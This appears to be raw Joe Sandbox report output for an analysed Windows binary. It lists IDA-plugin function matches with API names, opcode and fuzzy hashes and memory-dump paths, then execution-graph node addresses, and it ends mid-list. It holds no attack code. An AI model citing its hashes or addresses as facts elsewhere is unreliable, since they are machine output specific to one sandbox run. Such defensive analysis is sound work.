                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo$_get_daylight
                                                      • String ID:
                                                      • API String ID: 72036449-0
                                                      • Opcode ID: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                      • Instruction ID: f3246e3a1b4d204602f52103b824675f55c982086eb477dec39175048e88cb1f
                                                      • Opcode Fuzzy Hash: adda994bb8bdfca9ec35d26023c30ea6024999a432b5678b7d18df69566630e3
                                                      • Instruction Fuzzy Hash: CD51F13AE0C72762F778792A8407B79E781DB00714F9941B5DA0D462C5EE3DE840B279
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Context$CaptureEntryFunctionLookupRestoreUnwindVirtual
                                                      • String ID:
                                                      • API String ID: 3461063567-0
                                                      • Opcode ID: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                      • Instruction ID: 85f04bae8a038d355eaa41e86d956b506cc2540f59ecbe20b7c81e0a92a6d7f8
                                                      • Opcode Fuzzy Hash: b1f1ff61777923e7652156cc2d336024070dc023beb6a1960c7b554b607fa398
                                                      • Instruction Fuzzy Hash: 9B31183A918BC191EB60EB10E4463ABB3A1FBC9780F900176E68D43B68DF7DD154DB00
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CloseCodeErrorExitHandleLastObjectProcessSingleWait
                                                      • String ID:
                                                      • API String ID: 2321548817-0
                                                      • Opcode ID: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                      • Instruction ID: dc8acfc7b93297590b949bfa5e8a4138dc8bd74e9aac2067b7b83f3fef4054c1
                                                      • Opcode Fuzzy Hash: 82bfb5b300ae42bcdd7f9df15edbfe6164371cee34962632e7edd6329cc57e45
                                                      • Instruction Fuzzy Hash: 3F11B479A0C693A3FA507F25940263DE3A0AF45BA0F9842B0D92D47BC4DF3CE941A720
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                      • Instruction ID: 47fdff25ed7363630d140393206f334e72de6cd908cbb66bc63031d73a7dd84a
                                                      • Opcode Fuzzy Hash: f63cfcab38654406720fb298faccf2206334f1ee504fa2844d0f42e958091265
                                                      • Instruction Fuzzy Hash: AA61C6BA908A1396FB78AF24C05737CB7A1FBA1B0AF9415B5C60A421D5CF2DD442E724
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                      • Instruction ID: 6847fd58453edf3d859b97b51b1d9eda4d512e76d17ad2cb0692e781e5334a5c
                                                      • Opcode Fuzzy Hash: 0644313d939e58621442b79405c350c91277a9df8c69c39d18cf3d825145f917
                                                      • Instruction Fuzzy Hash: C861C67AA5D21396F774AF28806603CB7A5FB15B09FE411B5C60E46398CF3DE441EB20
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                      • Instruction ID: 78fd7d1dade4a143b7145e99e869c44e7fcc628aef217a1de9e7aef53a6d3138
                                                      • Opcode Fuzzy Hash: c220197af0a98cbd73017d0ba252ed5d07ee06621c5253f39b4124477447de71
                                                      • Instruction Fuzzy Hash: 3961A87B91C283A6F7A4AF24C04637CB7A1FB15B18F9411B5CA0A563D5CF2CE485E721
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID:
                                                      • API String ID: 3215553584-3916222277
                                                      • Opcode ID: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                      • Instruction ID: 83d9ec1244c49d5193f5b06abf1fd46d510009d4ac4b6ee4be2dd8c86b3e25c7
                                                      • Opcode Fuzzy Hash: b2dd0ee893780d50b4674af438db78039d6ef4c60853aa3ea8af484d06fe7f99
                                                      • Instruction Fuzzy Hash: F551967A90820396F764AF28C04637CB7A5FB05B28FD411B5C64A523D5EF3CD485EB22
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: _invalid_parameter_noinfo
                                                      • String ID: e+000$gfff
                                                      • API String ID: 3215553584-3030954782
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: !$fmod
                                                      • API String ID: 1757819995-3213614193
                                                      Similarity
                                                      • API ID: std::rsfun
                                                      • String ID: $$type parameter
                                                      • API String ID: 3764944385-1705267328
                                                      Similarity
                                                      • API ID: ErrorFileLastWrite
                                                      • String ID: U
                                                      • API String ID: 442123175-4171548499
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: "$pow
                                                      • API String ID: 1757819995-713443511
                                                      Similarity
                                                      • API ID: _set_errno_from_matherr
                                                      • String ID: tanh
                                                      • API String ID: 1187470696-874243715
                                                      Similarity
                                                      • API ID: CompareStringtry_get_function
                                                      • String ID: CompareStringEx
                                                      • API String ID: 3328479835-2590796910
                                                      Similarity
                                                      • API ID: DateFormattry_get_function
                                                      • String ID: GetDateFormatEx
                                                      • API String ID: 595753042-159735388
                                                      Similarity
                                                      • API ID: FormatTimetry_get_function
                                                      • String ID: GetTimeFormatEx
                                                      • API String ID: 3261793192-1692793031
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: !$sqrt
                                                      • API String ID: 1757819995-799759792
                                                      Similarity
                                                      • API ID: ExceptionFileHeaderRaise
                                                      • String ID: csm
                                                      • API String ID: 2573137834-1018135373
                                                      Similarity
                                                      • API ID: _handle_error
                                                      • String ID: "$exp
                                                      • API String ID: 1757819995-2878093337
                                                      Similarity
                                                      • API ID: ErrorFormatLastMessage_free_nolock
                                                      • String ID: system error %d
                                                      • API String ID: 3491801694-1688351658
                                                      • Opcode ID: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                      • Instruction ID: 20c8f41a6b61ca43b3bd5a7f5db3cc8df46b9100396018f5abe470a6137a303f
                                                      • Opcode Fuzzy Hash: 7e4d05fadd18b9b11f94f5c6425f15275c7a7fbc6ab491f3a12ea8099a6da99b
                                                      • Instruction Fuzzy Hash: 39014036A1868392FB60FB51F44636AF3A0FBC8784F804075E68D07A59DF3DE4089B10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: DefaultUsertry_get_function
                                                      • String ID: GetUserDefaultLocaleName
                                                      • API String ID: 3217810228-151340334
                                                      • Opcode ID: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                      • Instruction ID: aa059320cb5d0bf276ad73499a2b053f184e4ced98ee3c1414a681c79318998c
                                                      • Opcode Fuzzy Hash: c694d8fed7e650d7ae902cf5b79a7869b30411a5ab2e26c2c3eb6ddf0b08f9ee
                                                      • Instruction Fuzzy Hash: 3EF0BE59F08143A2FF04BB91B5961B8A2A2AF8C7C0FC440B5D90E02A91CE3CE649A320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39AF9
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF73AF3D7C2,?,?,00000000,00007FF73AF3D6BA,?,?,?,00007FF73AF2B0BD), ref: 00007FF73AF39B13
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                      • String ID: InitializeCriticalSectionEx
                                                      • API String ID: 539475747-3084827643
                                                      • Opcode ID: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                      • Instruction ID: d3989b357ca29f7c7bfc2324c27914207124bd4a078dded6654724bd125873da
                                                      • Opcode Fuzzy Hash: e01acae747cdeda195b10ee82353d8871bdea6c8613bfa92815bb754a0d07925
                                                      • Instruction Fuzzy Hash: 28F03069F18A42A1FB547B51A4820A9A220EF48BC0F8844B5E91E03B95CE3CE655D760
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • try_get_function.LIBVCRUNTIME ref: 00007FF73AF39851
                                                      • TlsSetValue.KERNEL32(?,?,?,00007FF73AF3AB66,?,?,?,00007FF73AF2AF01,?,?,?,?,00007FF73AF402A3), ref: 00007FF73AF39868
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: Valuetry_get_function
                                                      • String ID: FlsSetValue
                                                      • API String ID: 738293619-3750699315
                                                      • Opcode ID: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                      • Instruction ID: 484b39ad04f5cdfbfb8f59aaecdc8ecf24aa309d5a4c620ac5b3a1de23d11a2f
                                                      • Opcode Fuzzy Hash: 30b8eb45ebde45efd7bf4f457bf1e11275edc514c445f36cbdbaff7140e65dd7
                                                      • Instruction Fuzzy Hash: FFE065A9E08643B1FF047B51E4560B8A221AF88780FC840B5DA2E063D5CE3CE959D320
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF73AE7348C), ref: 00007FF73AE8DF1F
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF73AE7348C), ref: 00007FF73AE8DF83
                                                      • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF73AE7348C), ref: 00007FF73AE8DFB9
                                                      • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00007FF73AE7348C), ref: 00007FF73AE8E003
                                                      Memory Dump Source
                                                      • Source File: 00000011.00000002.2211254931.00007FF73AE61000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF73AE60000, based on PE: true
                                                      • Associated: 00000011.00000002.2211243829.00007FF73AE60000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211316885.00007FF73AF51000.00000002.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211335721.00007FF73AF6F000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211347766.00007FF73AF70000.00000008.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211360062.00007FF73AF72000.00000004.00000001.01000000.00000007.sdmp
                                                      • Associated: 00000011.00000002.2211372136.00007FF73AF75000.00000002.00000001.01000000.00000007.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_17_2_7ff73ae60000_NzEx.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave
                                                      • String ID:
                                                      • API String ID: 3168844106-0
                                                      • Opcode ID: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                      • Instruction ID: 009441c305adcf353c355452ed61f1a9e73f2c6cc38225544a59812db5dd1b04
                                                      • Opcode Fuzzy Hash: d7064577febaf475c7bb8ae2d0a4322ba4b58d71bdf70b5fad720353a296914f
                                                      • Instruction Fuzzy Hash: 1B311E7661CB8586DB60EB1AF45126ABBA0F799F98F040166EECD47B25CE2CD2448F10
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Execution Graph

                                                      Execution Coverage:3.2%
                                                      Dynamic/Decrypted Code Coverage:0%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:1282
                                                      Total number of Limit Nodes:24
7ff7b1e504a0 18 API calls 76422->76474 76475 7ff7b1e5d4f0 18 API calls 2 library calls 76422->76475 76424->76422 76427 7ff7b1e4aff8 _handle_error 76427->76244 76429 7ff7b1e05611 76428->76429 76512 7ff7b1e3aa90 76429->76512 76431 7ff7b1e0597e 76431->76246 76432 7ff7b1e0583b 76432->76431 76515 7ff7b1e5ee70 15 API calls 2 library calls 76432->76515 76434 7ff7b1e0589d 76434->76431 76435 7ff7b1dfb7a0 type_info::_name_internal_method 15 API calls 76434->76435 76436 7ff7b1e058e9 Concurrency::details::_UnrealizedChore::_CancelViaToken 76435->76436 76516 7ff7b1e5f070 73 API calls _wcsupr_s 76436->76516 76439 7ff7b1e4a926 76438->76439 76440 7ff7b1e4a930 76438->76440 76477 7ff7b1e65d90 15 API calls _free_nolock 76439->76477 76440->76405 76478 7ff7b1df8d00 76442->76478 76444 7ff7b1e0383b memcpy_s 76444->76407 76446 7ff7b1e3aa49 76445->76446 76447 7ff7b1e3aa3d 76445->76447 76487 7ff7b1e3aee0 76446->76487 76484 7ff7b1e3b0e0 76447->76484 76450 7ff7b1e3aa47 76451 7ff7b1e5c660 76450->76451 76503 7ff7b1e52a10 18 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76451->76503 76453 7ff7b1e5c685 76453->76422 76455 7ff7b1e5e3e6 76454->76455 76456 7ff7b1e5e5dd 76455->76456 76504 7ff7b1e036b0 5 API calls 2 library calls 76455->76504 76456->76422 76460 7ff7b1e4e16f 76458->76460 76459 7ff7b1e4e273 76459->76422 76461 7ff7b1e4e1e6 76460->76461 76505 7ff7b1e4b460 76460->76505 76461->76459 76463 7ff7b1e4b460 18 API calls 76461->76463 76463->76461 76466 7ff7b1e521c8 type_info::_name_internal_method 76464->76466 76465 7ff7b1e52291 76465->76422 76466->76465 76510 7ff7b1e4e540 15 API calls Concurrency::details::_UnrealizedChore::_CancelViaToken 76466->76510 76469 7ff7b1e4af63 76468->76469 76470 7ff7b1e4f775 76468->76470 76469->76427 76476 7ff7b1e036b0 5 API calls 2 library calls 76469->76476 76470->76469 76511 7ff7b1e036b0 5 API calls 2 library calls 76470->76511 76472->76422 76473->76422 76474->76422 76475->76422 76476->76427 76477->76440 76480 7ff7b1df8d45 76478->76480 76482 
7ff7b1e08b40 10 API calls 76478->76482 76479 7ff7b1df8d64 76479->76444 76480->76479 76483 7ff7b1df0690 15 API calls 2 library calls 76480->76483 76482->76480 76483->76479 76493 7ff7b1e3af50 76484->76493 76488 7ff7b1e3aefe 76487->76488 76491 7ff7b1e3af2e 76487->76491 76500 7ff7b1e3ade0 VirtualProtect 76488->76500 76491->76450 76498 7ff7b1e3af88 Concurrency::details::_UnrealizedChore::_CancelViaToken 76493->76498 76494 7ff7b1e3b0c3 76495 7ff7b1e036b0 Concurrency::details::_UnrealizedChore::_CancelViaToken 5 API calls 76494->76495 76496 7ff7b1e3b03b 76495->76496 76496->76450 76497 7ff7b1e3ad30 6 API calls 76497->76498 76498->76494 76498->76496 76498->76497 76499 7ff7b1e3ada0 VirtualFree 76498->76499 76499->76498 76501 7ff7b1e3ae11 76500->76501 76501->76491 76502 7ff7b1e3ae40 15 API calls 2 library calls 76501->76502 76502->76491 76503->76453 76504->76456 76506 7ff7b1e4b48d 76505->76506 76507 7ff7b1e4b483 76505->76507 76506->76460 76509 7ff7b1e4b410 18 API calls 76507->76509 76509->76506 76510->76466 76511->76469 76513 7ff7b1e3aee0 16 API calls 76512->76513 76514 7ff7b1e3aabe 76513->76514 76514->76432 76515->76434 76516->76431 76528 7ff7b1e3a990 76517->76528 76519 7ff7b1e03ef3 76519->76216 76521 7ff7b1e02802 76520->76521 76523 7ff7b1e0280c 76520->76523 76533 7ff7b1e37300 VirtualFree 76521->76533 76523->76218 76525 7ff7b1e08af3 76524->76525 76526 7ff7b1e08b35 76525->76526 76534 7ff7b1e08c90 GetLastError 76525->76534 76526->76219 76529 7ff7b1e3a9ca 76528->76529 76530 7ff7b1e3aa0d 76529->76530 76532 7ff7b1e3ada0 VirtualFree 76529->76532 76530->76519 76532->76529 76533->76523 76538 7ff7b1e08cb2 76534->76538 76535 7ff7b1e08cbe VirtualQuery 76537 7ff7b1e08cd9 76535->76537 76535->76538 76536 7ff7b1e08d65 SetLastError 76536->76537 76537->76525 76538->76535 76538->76536 76538->76537 76539 7ff7b1e08d18 VirtualFree 76538->76539 76539->76537 76539->76538 76540->76178 76541->76180 76543 7ff7b1deb563 76542->76543 76544 7ff7b1deb4f8 76542->76544 76543->76175 76544->76543 76546 
7ff7b1deaca0 15 API calls 2 library calls 76544->76546 76546->76543 76548 7ff7b1e0e33e 76547->76548 76549 7ff7b1e0e2f6 76547->76549 76548->76184 76553 7ff7b1e0e6e0 WaitForSingleObject DeleteCriticalSection 76549->76553 76551 7ff7b1e0e300 76554 7ff7b1e03bb0 74 API calls 3 library calls 76551->76554 76553->76551 76554->76548 76555 7ff7b1de2282 76556 7ff7b1de229c 76555->76556 76556->76555 76558 7ff7b1dfcf10 76556->76558 76559 7ff7b1dfcf2e wcsxfrm 76558->76559 76562 7ff7b1dfcaf0 76559->76562 76561 7ff7b1dfcf68 76561->76556 76563 7ff7b1dfcb4b 76562->76563 76575 7ff7b1dfcbba wcsxfrm 76562->76575 76564 7ff7b1dfcb6a 76563->76564 76579 7ff7b1df0950 15 API calls strrchr 76563->76579 76566 7ff7b1dfcc29 76564->76566 76569 7ff7b1dfcb89 76564->76569 76568 7ff7b1df8d00 _free_nolock 15 API calls 76566->76568 76568->76575 76571 7ff7b1df8d00 _free_nolock 15 API calls 76569->76571 76570 7ff7b1dfcec5 wcsxfrm 76570->76561 76571->76575 76572 7ff7b1dfcde6 76574 7ff7b1df8d00 _free_nolock 15 API calls 76572->76574 76578 7ff7b1dfce28 wcsxfrm 76572->76578 76574->76578 76577 7ff7b1dfccde wcsxfrm 76575->76577 76580 7ff7b1dfde50 15 API calls 2 library calls 76575->76580 76577->76572 76577->76578 76581 7ff7b1dfd5c0 15 API calls wcsxfrm 76577->76581 76578->76570 76582 7ff7b1dfd720 15 API calls 3 library calls 76578->76582 76579->76564 76580->76577 76581->76577 76582->76578 76583 7ff7b1de1a21 76586 7ff7b1dffd90 76583->76586 76585 7ff7b1de1a47 76585->76585 76592 7ff7b1dffdb8 76586->76592 76587 7ff7b1dffeb0 wcsxfrm 76591 7ff7b1dfff71 strrchr _mbsncpy_s 76587->76591 76613 7ff7b1df0a70 15 API calls 2 library calls 76587->76613 76591->76585 76592->76587 76592->76591 76593 7ff7b1e002a6 76592->76593 76606 7ff7b1dff2a0 76592->76606 76610 7ff7b1dff2f0 76592->76610 76614 7ff7b1df0950 15 API calls strrchr 76592->76614 76594 7ff7b1e002b7 76593->76594 76597 7ff7b1e002fd 76593->76597 76615 7ff7b1e1e9c0 15 API calls 76594->76615 76598 7ff7b1e0037d 76597->76598 76603 7ff7b1e00333 76597->76603 76600 7ff7b1e00396 
